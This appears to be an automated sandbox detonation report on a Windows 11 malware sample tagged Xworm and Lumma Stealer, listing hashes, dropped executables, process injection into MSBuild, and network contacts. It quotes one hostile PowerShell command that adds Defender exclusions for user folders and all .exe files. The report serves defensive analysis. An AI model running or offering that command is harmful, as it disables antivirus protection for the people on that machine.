| MD5 | f7f9ed55e782f4d2d43fb0703dd1273f |
| SHA1 | 8bb98c59bb35055ccf1b52ef12db24cca50b58b0 |
| SHA256 | ad044817d9a6c1b798001fbf0f769c0ac1d8486afb9dede03543b934be6df3c6 |
| SHA512 | 1126c63648b573b01bcffc1ac037c3ed29074834f1716e54352a1679a4c9d5d393068b22e3820c62e398ab81d127fc242f306e158bf393e58742995df7896ce7 |
memory/5500-37-0x00007FFBC8DD3000-0x00007FFBC8DD5000-memory.dmp
memory/4884-41-0x0000000000AC0000-0x0000000000EFC000-memory.dmp
memory/4884-42-0x0000000005780000-0x0000000005AF8000-memory.dmp
memory/4884-43-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-46-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-52-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-58-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-56-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-54-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-50-0x0000000005780000-0x0000000005AF1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe
| MD5 | bee498bb6818e1eec3f96ed8c371e4c3 |
| SHA1 | 5cd9f249cb2e4888b6ff488e2b3795ead65460f9 |
| SHA256 | 5dcd18a45f245b8f03ee330afd54014c3dcd6e96b0f9fa0d9b2c98498fd11306 |
| SHA512 | 0821397200c422f1c912a11babb17da7c0fad61ad7fd1e66950fdf80217d87e17b571713b83b66bdbc63996dd01637437296fd186bb205e5665f0965d599bca1 |
memory/4884-76-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-105-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-107-0x0000000005780000-0x0000000005AF1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
| MD5 | ae20c32d0b9e8699756e93f9372972fa |
| SHA1 | 0a80ba47f8175b177ff7f507906e376f0b1a3db3 |
| SHA256 | 5054d87f5429374c958f4ee191993b826be2568307c5b53067c0ee771690591d |
| SHA512 | a37cb8de74b593304985d896c1bf86cd6dd144f72d24cd3796308ea04c218c09dc3716a3e66fe3c1455b61a3b8a96e1c942c67ef291e9da15e4a662ac4669f1a |
memory/3604-251-0x0000000000690000-0x000000000069E000-memory.dmp
memory/4884-113-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-111-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-109-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-103-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-102-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-99-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-95-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-93-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-115-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-91-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-88-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-97-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/5500-89-0x00007FFBC8DD0000-0x00007FFBC9891000-memory.dmp
memory/4884-82-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-80-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-79-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-74-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-72-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-86-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-84-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-48-0x0000000005780000-0x0000000005AF1000-memory.dmp
memory/4884-44-0x0000000005780000-0x0000000005AF1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x2ywvoq5.nv1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1608-2656-0x000001FB3DA50000-0x000001FB3DA72000-memory.dmp
memory/4884-6093-0x0000000005E00000-0x0000000005EFC000-memory.dmp
memory/4884-6094-0x0000000005F60000-0x000000000605A000-memory.dmp
memory/4884-6095-0x0000000006060000-0x00000000060AC000-memory.dmp
memory/4884-6102-0x0000000006940000-0x0000000006EE4000-memory.dmp
memory/4884-6103-0x00000000063D0000-0x0000000006424000-memory.dmp
memory/2244-6146-0x00000123EDE00000-0x00000123EDE1C000-memory.dmp
memory/2244-6147-0x00000123EDE20000-0x00000123EDED5000-memory.dmp
memory/2244-6148-0x00000123EDEE0000-0x00000123EDEEA000-memory.dmp
memory/2244-6149-0x00000123EE050000-0x00000123EE06C000-memory.dmp
memory/2244-6150-0x00000123EE030000-0x00000123EE03A000-memory.dmp
memory/2244-6151-0x00000123EE090000-0x00000123EE0AA000-memory.dmp
memory/2244-6152-0x00000123EE040000-0x00000123EE048000-memory.dmp
memory/2244-6153-0x00000123EE070000-0x00000123EE076000-memory.dmp
memory/2244-6154-0x00000123EE080000-0x00000123EE08A000-memory.dmp
memory/2344-6157-0x00000167659C0000-0x00000167659EA000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | bdb25c22d14ec917e30faf353826c5de |
| SHA1 | 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190 |
| SHA256 | e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495 |
| SHA512 | b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | aa187cac09f051e24146ad549a0f08a6 |
| SHA1 | 2ef7fae3652bb838766627fa6584a6e3b5e74ff3 |
| SHA256 | 7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f |
| SHA512 | 960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-06-05 19:12
Reported
2025-06-05 19:13
Platform
win11-20250502-en
Max time kernel
20s
Max time network
30s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer, LummaC
Lumma family
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\XClient.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1792 set thread context of 5552 | N/A | C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 684 set thread context of 4100 | N/A | C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\XClient.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe
"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"
C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe
"C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe"
C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe
"C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe
"C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe"
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| UA | 185.156.72.2:80 | 185.156.72.2 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| US | 154.53.41.5:80 | 154.53.41.5 | tcp |
| KR | 218.236.59.183:47006 | 218.236.59.183 | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| US | 154.53.41.5:1144 | tcp | |
| US | 154.53.41.5:1144 | tcp |
Files
memory/5420-0-0x00007FF92E833000-0x00007FF92E835000-memory.dmp
memory/5420-1-0x0000000000A30000-0x0000000000A38000-memory.dmp
memory/5420-2-0x00007FF92E830000-0x00007FF92F2F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe
| MD5 | a4800db4a176fdba6d86bde9e21d7d4b |
| SHA1 | c927378fd0aff61a865860b81ea49182ad3fc896 |
| SHA256 | 4738fee480de92666fc5cb7e6c9a4b0d97cd3d3b7ff9d642288e0cc604d407ae |
| SHA512 | cbcecf64126f92844858213e7050942c63cbdf23522e1e8ac0887c655c615239bdf4111475a7ebffa4bf700ec59b6a8125fed46201ff2238eb9d8e4c8e4236c6 |
C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe
| MD5 | 45445e04eeaaab44456e4296c25ddb1b |
| SHA1 | 75f242422d7329a0a3f9a1230cf694443601717e |
| SHA256 | 82f77e79a0052160d388738a17a60e3733e439dd6beb53c88232e075ccef7d6e |
| SHA512 | ffde7a5727e67998e09cfa90b8db7ac11f17b815a3c846a0a52cf98962049bdb7da94aa0a74f26977a2797309835fd4638c636a6e9412ddc22746fe39af776a6 |
memory/5552-24-0x0000000000400000-0x000000000045F000-memory.dmp
memory/5552-26-0x0000000000400000-0x000000000045F000-memory.dmp
memory/5552-27-0x0000000000400000-0x000000000045F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
| MD5 | f7f9ed55e782f4d2d43fb0703dd1273f |
| SHA1 | 8bb98c59bb35055ccf1b52ef12db24cca50b58b0 |
| SHA256 | ad044817d9a6c1b798001fbf0f769c0ac1d8486afb9dede03543b934be6df3c6 |
| SHA512 | 1126c63648b573b01bcffc1ac037c3ed29074834f1716e54352a1679a4c9d5d393068b22e3820c62e398ab81d127fc242f306e158bf393e58742995df7896ce7 |
memory/5552-36-0x0000000000400000-0x000000000045F000-memory.dmp
memory/4108-40-0x0000000000B50000-0x0000000000F8C000-memory.dmp
memory/4108-41-0x00000000059F0000-0x0000000005D68000-memory.dmp
memory/4108-43-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-51-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-59-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-74-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-86-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-84-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-100-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-113-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-111-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-109-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/5420-143-0x00007FF92E833000-0x00007FF92E835000-memory.dmp
memory/4108-107-0x00000000059F0000-0x0000000005D61000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe
| MD5 | bee498bb6818e1eec3f96ed8c371e4c3 |
| SHA1 | 5cd9f249cb2e4888b6ff488e2b3795ead65460f9 |
| SHA256 | 5dcd18a45f245b8f03ee330afd54014c3dcd6e96b0f9fa0d9b2c98498fd11306 |
| SHA512 | 0821397200c422f1c912a11babb17da7c0fad61ad7fd1e66950fdf80217d87e17b571713b83b66bdbc63996dd01637437296fd186bb205e5665f0965d599bca1 |
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
| MD5 | ae20c32d0b9e8699756e93f9372972fa |
| SHA1 | 0a80ba47f8175b177ff7f507906e376f0b1a3db3 |
| SHA256 | 5054d87f5429374c958f4ee191993b826be2568307c5b53067c0ee771690591d |
| SHA512 | a37cb8de74b593304985d896c1bf86cd6dd144f72d24cd3796308ea04c218c09dc3716a3e66fe3c1455b61a3b8a96e1c942c67ef291e9da15e4a662ac4669f1a |
memory/4108-105-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4768-157-0x0000000000930000-0x000000000093E000-memory.dmp
memory/4108-89-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-82-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-80-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-102-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-78-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-76-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-72-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-70-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-68-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-66-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-63-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-61-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-57-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-55-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-53-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-49-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-47-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-45-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/4108-42-0x00000000059F0000-0x0000000005D61000-memory.dmp
memory/5420-253-0x00007FF92E830000-0x00007FF92F2F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o4gthjps.2w3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4588-2397-0x000001EF1D250000-0x000001EF1D272000-memory.dmp